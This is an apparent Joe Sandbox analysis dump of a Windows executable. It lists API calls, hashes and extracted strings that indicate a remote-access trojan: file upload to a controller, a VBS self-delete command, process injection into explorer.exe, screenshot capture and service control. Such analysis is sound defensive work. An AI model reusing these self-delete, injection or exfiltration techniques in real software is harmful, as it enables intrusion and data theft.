                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                  • API String ID: 1884690901-3066803209
                                                  • Opcode ID: e0a7b54fd57e2d7d126af04f0ae0c5120e71f538bfcccab808dee00b8c09f42b
                                                  • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                  • Opcode Fuzzy Hash: e0a7b54fd57e2d7d126af04f0ae0c5120e71f538bfcccab808dee00b8c09f42b
                                                  • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$getaddrinfo
                                                  • API String ID: 2490988753-3078833738
                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                  • _free.LIBCMT ref: 004500A6
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 004500C8
                                                  • _free.LIBCMT ref: 004500DD
                                                  • _free.LIBCMT ref: 004500E8
                                                  • _free.LIBCMT ref: 0045010A
                                                  • _free.LIBCMT ref: 0045011D
                                                  • _free.LIBCMT ref: 0045012B
                                                  • _free.LIBCMT ref: 00450136
                                                  • _free.LIBCMT ref: 0045016E
                                                  • _free.LIBCMT ref: 00450175
                                                  • _free.LIBCMT ref: 00450192
                                                  • _free.LIBCMT ref: 004501AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041912D
                                                  • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                  • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                  • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 489098229-65789007
                                                  • Opcode ID: d035b23978f635d26d413941e86b53147c054b16f8fc180901addfee223a089d
                                                  • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                  • Opcode Fuzzy Hash: d035b23978f635d26d413941e86b53147c054b16f8fc180901addfee223a089d
                                                  • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.KERNELBASE(00000000), ref: 0041269D
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                  • ExitProcess.KERNEL32 ref: 0040C832
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-390638927
                                                  • Opcode ID: 508d0871e15571b78838a5b212a0624c53e744e3e86450f5b9076bd3877095ab
                                                  • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                  • Opcode Fuzzy Hash: 508d0871e15571b78838a5b212a0624c53e744e3e86450f5b9076bd3877095ab
                                                  • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                  • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                  APIs
                                                    • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                  • GetLastError.KERNEL32 ref: 00454A96
                                                  • __dosmaperr.LIBCMT ref: 00454A9D
                                                  • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                  • GetLastError.KERNEL32 ref: 00454AB3
                                                  • __dosmaperr.LIBCMT ref: 00454ABC
                                                  • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                  • CloseHandle.KERNEL32(?), ref: 00454C26
                                                  • GetLastError.KERNEL32 ref: 00454C58
                                                  • __dosmaperr.LIBCMT ref: 00454C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                  • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                  • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                  • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$@FG$TUF$Temp
                                                  • API String ID: 1107811701-4124992407
                                                  • Opcode ID: da31c6e90c59349188404fc22a6090c804e951fbc63525471b79a6f74673dd73
                                                  • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                  • Opcode Fuzzy Hash: da31c6e90c59349188404fc22a6090c804e951fbc63525471b79a6f74673dd73
                                                  • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\NssBkEQKsI.exe), ref: 00406705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                                                  • API String ID: 2050909247-1144799832
                                                  • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                  • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                  • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                  • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 9d8e7f87282af37f703d768948872991907313222737124b9039bfb3909b9172
                                                  • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                  • Opcode Fuzzy Hash: 9d8e7f87282af37f703d768948872991907313222737124b9039bfb3909b9172
                                                  • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                                  • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                  • Opcode Fuzzy Hash: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                                  • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                  APIs
                                                  • _free.LIBCMT ref: 00446DDF
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 00446DEB
                                                  • _free.LIBCMT ref: 00446DF6
                                                  • _free.LIBCMT ref: 00446E01
                                                  • _free.LIBCMT ref: 00446E0C
                                                  • _free.LIBCMT ref: 00446E17
                                                  • _free.LIBCMT ref: 00446E22
                                                  • _free.LIBCMT ref: 00446E2D
                                                  • _free.LIBCMT ref: 00446E38
                                                  • _free.LIBCMT ref: 00446E46
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B83C
                                                  • DisplayName, xrefs: 0041B8D1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                  • API String ID: 1332880857-3614651759
                                                  • Opcode ID: beee8cc8128c5b6292a52baa65063b935d7e49e28abb99bedb81eb58e8c596e1
                                                  • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                  • Opcode Fuzzy Hash: beee8cc8128c5b6292a52baa65063b935d7e49e28abb99bedb81eb58e8c596e1
                                                  • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
